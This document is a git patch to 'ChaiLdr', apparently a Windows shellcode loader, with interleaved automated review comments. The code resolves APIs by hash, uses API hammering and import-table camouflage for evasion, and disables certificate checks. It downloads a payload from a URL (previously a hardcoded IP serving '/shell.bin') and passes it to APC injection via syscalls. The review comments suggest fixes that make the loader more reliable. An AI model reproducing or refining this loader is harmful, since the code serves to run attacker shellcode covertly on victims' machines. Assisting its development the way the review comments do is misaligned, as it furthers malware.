From 9b6e8ecfd52d3f04d19b10f5a133045c2573ccd4 Mon Sep 17 00:00:00 2001
From: come2arkside <69916703+come2darkside@users.noreply.github.com>
Date: Fri, 17 May 2024 16:57:15 +0300
Subject: [PATCH] Can get full path url as one argument

---
 ChaiLdr/downloader.c | 161 ++++++++++++++++----------------------
 ChaiLdr/include/common.h | 3 +-
 ChaiLdr/include/typedef.h | 4 +-
 ChaiLdr/inject.c | 4 +
 ChaiLdr/main.c | 69 +++++++++-------
 5 files changed, 119 insertions(+), 122 deletions(-)

diff --git a/ChaiLdr/downloader.c b/ChaiLdr/downloader.c
index cb1b029..84a65f5 100644
--- a/ChaiLdr/downloader.c
+++ b/ChaiLdr/downloader.c
@@ -5,104 +5,81 @@
 #include "include/common.h"
 #define InternetOpenA_JOAA 0x154BE30F
-#define InternetConnectA_JOAA 0x51CC39CF
-#define HttpOpenRequestA_JOAA 0x03084192
-#define InternetSetOptionA_JOAA 0xD8C64F22
-#define HttpSendRequestA_JOAA 0xA14CFDA5
+#define InternetOpenUrlA_JOAA 0x36430125
+#define InternetSetOptionA_JOAA 0xD8C64F22
 #define InternetReadFile_JOAA 0xF1FF9642
-#define InternetCloseHandle_JOAA 0x9E679473
+#define InternetCloseHandle_JOAA 0x9E679473
 #define GetTickCount64_JOAA 0x00BB616E
-#define LoadLibraryA_JOAA 0x54C1D227
+#define LoadLibraryA_JOAA 0x54C1D227
 #define KERNEL32DLL_JOAA 0xFD2AD9BD
 #define WININETDLL_JOAA 0x668CA1EC
 API_HASHING g_Api = { 0 };
-DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl)
+DWORD Download(char** response, char* url, BOOL ssl)
 {
- HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA);
- g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA);
-
- HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll");
-
- g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA);
- g_Api.pInternetConnectA = (fnInternetConnectA)GetProcAddressH(wininet_handle, InternetConnectA_JOAA);
- g_Api.pHttpOpenRequestA = (fnHttpOpenRequestA)GetProcAddressH(wininet_handle, HttpOpenRequestA_JOAA);
- g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA);
- g_Api.pHttpSendRequestA = (fnHttpSendRequestA)GetProcAddressH(wininet_handle, HttpSendRequestA_JOAA);
- g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA);
- g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA);
- g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA);
-
-
- if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n");
- if (g_Api.pInternetOpenA == NULL)
printf("InternetOpenA\n");
- if (g_Api.pInternetConnectA == NULL) printf("InternetConnectA\n");
- if (g_Api.pHttpOpenRequestA == NULL) printf("HttpOpenRequestA\n");
- if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n");
- if (g_Api.pHttpSendRequestA == NULL) printf("HttpSendRequestA\n");
- if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n");
- if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n");
-
-
- DWORD bytesRead = 0;
- DWORD totalBytesRead = 0;
- const DWORD bufferSize = 1024;
- char buffer[1024];
-
- HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
-
- if (hInternet == NULL)
- return -1;
-
- // connect to remote server
- HINTERNET hConnect = NULL;
- if(ssl)
- hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL);
- else
- hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL);
-
- if (hConnect == NULL)
- {
- g_Api.pInternetCloseHandle(hInternet);
- return -1;
- }
-
- HINTERNET hRequest = NULL;
- if(ssl)
- hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint , NULL, NULL, NULL, (INTERNET_FLAG_SECURE | INTERNET_FLAG_DONT_CACHE), 0);
- else
- hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint, NULL, NULL, NULL, (INTERNET_FLAG_DONT_CACHE), 0);
-
- DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
-
- g_Api.pInternetSetOptionA(hRequest, INTERNET_OPTION_SECURITY_FLAGS,&flags,sizeof(flags));
-
- BOOL status = g_Api.pHttpSendRequestA(hRequest,NULL,0,NULL,0);
-
- DWORD dwBytesRead = NULL;
- SIZE_T sSize = 0;
-
- *response = (char*)malloc(1);
- do {
- if (g_Api.pInternetReadFile(hRequest, buffer, bufferSize,
&bytesRead)) {
- if (bytesRead > 0) {
- char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1);
- if (temp == NULL) {
- return NULL;
- }
- else {
- *response = temp;
- memcpy(*response + totalBytesRead, buffer, bytesRead);
- totalBytesRead += bytesRead;
- (*response)[totalBytesRead] = '\0';
- }
- }
- }
- } while (bytesRead > 0);
-
- g_Api.pInternetCloseHandle(hInternet);
- g_Api.pInternetCloseHandle(hRequest);
- return totalBytesRead;
-}
\ No newline at end of file
+ HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA);
+ g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA);
+
+ HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll");
+
+ g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA);
+ g_Api.pInternetOpenUrlA = (fnInternetOpenUrlA)GetProcAddressH(wininet_handle, InternetOpenUrlA_JOAA);
+ g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA);
+ g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA);
+ g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA);
+ g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA);
+
+ if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n");
+ if (g_Api.pInternetOpenA == NULL) printf("InternetOpenA\n");
+ if (g_Api.pInternetOpenUrlA == NULL) printf("InternetOpenUrlA\n");
+
+ if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n");
+ if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n");
+ if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n");
+
+ DWORD bytesRead = 0;
+ DWORD totalBytesRead = 0;
+ const DWORD bufferSize = 1024;
+ char buffer[1024];
+
+ HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+
+ if (hInternet == NULL)
+ return -1;
+
+ // Open URL directly
+ HINTERNET hUrl = g_Api.pInternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_DONT_CACHE | (ssl ? INTERNET_FLAG_SECURE : 0), 0);
+
+ if (hUrl == NULL)
+ {
+ g_Api.pInternetCloseHandle(hInternet);
+ return -1;
+ }
+
+ DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
+ g_Api.pInternetSetOptionA(hUrl, INTERNET_OPTION_SECURITY_FLAGS, &flags, sizeof(flags));
+
+ *response = (char*)malloc(1);
+ do {
+ if (g_Api.pInternetReadFile(hUrl, buffer, bufferSize, &bytesRead)) {
+ if (bytesRead > 0) {
+ char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1);
+ if (temp == NULL) {
+ return NULL;
+ }
+ else {
+ *response = temp;
+ memcpy(*response + totalBytesRead, buffer, bytesRead);
+ totalBytesRead += bytesRead;
+ (*response)[totalBytesRead] = '\0';
+ }
+ }
+ }
+ } while (bytesRead > 0);
+
+ g_Api.pInternetCloseHandle(hUrl);
+ g_Api.pInternetCloseHandle(hInternet);
+ return totalBytesRead;
+}
diff --git a/ChaiLdr/include/common.h b/ChaiLdr/include/common.h
index 82bffcc..b238fe7 100644
--- a/ChaiLdr/include/common.h
+++ b/ChaiLdr/include/common.h
@@ -23,6 +23,7 @@ typedef struct _API_HASHING {
 fnInternetReadFile pInternetReadFile;
 fnInternetCloseHandle pInternetCloseHandle;
 fnLoadLibraryA pLoadLibraryA;
+ fnInternetOpenUrlA pInternetOpenUrlA;
 } API_HASHING, * PAPI_HASHING;
 // inject.c
@@ -38,7 +39,7 @@ HMODULE GetModuleHandleH(DWORD dwModuleNameHash);
 BOOL ApiHammering(DWORD Stress);
 // downloader.c
-DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl);
+DWORD Download(char** response, char* url, BOOL ssl);
 //iatcamo.c
 VOID IatCamouflage();
\ No newline at end of file
diff --git a/ChaiLdr/include/typedef.h b/ChaiLdr/include/typedef.h
index 113ac5c..09dcb2b 100644
--- a/ChaiLdr/include/typedef.h
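Review bot: The `return NULL;` taken when realloc fails inside the read loop returns 0 from a DWORD-returning function, which a caller cannot tell apart from an empty body, and it leaves the partial `*response` buffer, `hUrl` and `hInternet` unreleased, while every other failure exit in this function closes `hInternet` and returns -1. That branch should free the partial buffer, null out `*response`, close both handles and return -1 so callers see a single failure convention; the rewritten branch is below. The NULL checks on the resolved function pointers above the loop have the same shape of problem: a missing `pInternetOpenUrlA` or `pInternetReadFile` is printed and then called through anyway, so each of those checks should also return -1 instead of continuing. The return value of `pInternetSetOptionA` is discarded as well.
```c
if (temp == NULL) {
    /* realloc failed: release the partial body and both handles,
       then fail the same way the other error paths do */
    free(*response);
    *response = NULL;
    g_Api.pInternetCloseHandle(hUrl);
    g_Api.pInternetCloseHandle(hInternet);
    return -1;
}
/* … unchanged: append to *response and continue the read loop … */
```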
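Review bot: The new prototype takes `char* url` although `Download` only reads the string and hands it to an `LPCSTR` parameter, so it should be `const char* url` to let callers pass string literals and const data without a cast. The declaration also carries no statement of its contract; add `// Returns the byte count stored in *response (heap-allocated, caller frees), or (DWORD)-1 on failure.` above it so callers compare the result against the right type.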
+++ b/ChaiLdr/include/typedef.h
@@ -19,4 +19,6 @@ typedef BOOL(WINAPI* fnInternetReadFile)(HINTERNET hFile, LPVOID lpBuffer, DWORD
 typedef BOOL(WINAPI* fnInternetCloseHandle)(HINTERNET hInternet);
-typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName);
\ No newline at end of file
+typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName);
+
+typedef HINTERNET(WINAPI* fnInternetOpenUrlA)(HINTERNET hInternet, LPCSTR lpszUrl, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwFlags, DWORD_PTR dwContext);
diff --git a/ChaiLdr/inject.c b/ChaiLdr/inject.c
index 653e341..3c285b3 100644
--- a/ChaiLdr/inject.c
+++ b/ChaiLdr/inject.c
@@ -13,6 +13,10 @@ BOOL ApcInjectionViaSyscalls(HANDLE hProcess, HANDLE hThread, PVOID pPayload, SI
 // Allocating memory
 if ((STATUS = Sw3NtAllocateVirtualMemory(hProcess, &pAddress, 0, &sPayloadSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) != 0) {
+ printf("[!] hProcess : %d \n", hProcess);
+ printf("[!] pAddress : %p \n", pAddress);
+ printf("[!] sPayloadSize : %d \n", sPayloadSize);
+ printf("[!] NtAllocateVirtualMemory Failed With Error : 0x%0.8X \n", STATUS);
 goto _Cleanup;
 }
diff --git a/ChaiLdr/main.c b/ChaiLdr/main.c
index beb75a7..9427381 100644
--- a/ChaiLdr/main.c
+++ b/ChaiLdr/main.c
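Review bot: The added `printf` lines pass `hProcess` (a HANDLE, i.e. a pointer) and `sPayloadSize` (a SIZE_T) to `%d`, which is a format/argument mismatch (undefined behavior) and prints truncated values on a 64-bit build; use `%p` for the handle and `%zu` for the size, e.g. `printf("[!] hProcess : %p \n", hProcess);` and `printf("[!] sPayloadSize : %zu \n", sPayloadSize);`. `0x%0.8X` expects an unsigned argument, so if `STATUS` is a signed NTSTATUS it should be passed as `(unsigned)STATUS`. The enclosing `ApcInjectionViaSyscalls` body begins and ends outside this hunk.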
@@ -1,35 +1,48 @@
 #include
+#include
+#include
 #include "include/common.h"
-int main()
+int main(int argc, char* argv[])
 {
- ApiHammering(2000);
-
- IatCamouflage();
-
- unsigned char* pPayload = NULL;
-
- PSTR url = "192.168.231.130";
- PSTR endpoint = "/shell.bin";
-
- SIZE_T sSize = Download(&pPayload, url, endpoint, FALSE);
-
- if (sSize == -1)
- goto _Cleanup;
- //Printing shellcode
- /*printf("[*] Shellcode: \n");
- for (SIZE_T i = 0; i < sSize; i++)
- {
- printf("%02X ", pPayload[i]);
- }
- printf("\n");*/
-
- if (InitiateInjection(pPayload,sSize))
- {
- return -1;
- }
+ if (argc != 2) {
+ fprintf(stderr, "Usage: %s \n", argv[0]);
+ return -1;
+ }
-_Cleanup:
- return 0;
+ PSTR fullUrl = argv[1];
+
+
+
+ if (fullUrl == NULL) {
+ fprintf(stderr, "Invalid format. Expected format: \n");
+ return -1;
+ }
+
+ ApiHammering(2000);
+
+ IatCamouflage();
+
+ unsigned char* pPayload = NULL;
+ SIZE_T sSize = Download(&pPayload, fullUrl, FALSE);
+
+ if (sSize == -1)
+ goto _Cleanup;
+
+ // Printing shellcode
+ /*printf("[*] Shellcode: \n");
+ for (SIZE_T i = 0; i < sSize; i++)
+ {
+ printf("%02X ", pPayload[i]);
+ }
+ printf("\n");*/
+
+ if (InitiateInjection(pPayload, sSize))
+ {
+ return -1;
+ }
+
+_Cleanup:
+ return 0;
 }
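Review bot: `if (sSize == -1)` cannot detect a failed download because `Download` returns a DWORD: its `-1` is 0xFFFFFFFF, which widens to SIZE_T 0x00000000FFFFFFFF on a 64-bit build, while the literal `-1` converts to SIZE_T 0xFFFFFFFFFFFFFFFF, so the comparison is false and the error value flows on to `InitiateInjection` as a size. Keep the result in the callee's type and compare against the same constant, e.g. `DWORD dwSize = Download(&pPayload, fullUrl, FALSE);` followed by `if (dwSize == (DWORD)-1) goto _Cleanup;`. The `if (fullUrl == NULL)` check is dead once `argc != 2` has been rejected, since `argv[1]` is non-NULL whenever `argc == 2`. `pPayload` is allocated by `Download` and is never freed on either exit path; `_Cleanup` is the natural place for `free(pPayload);`.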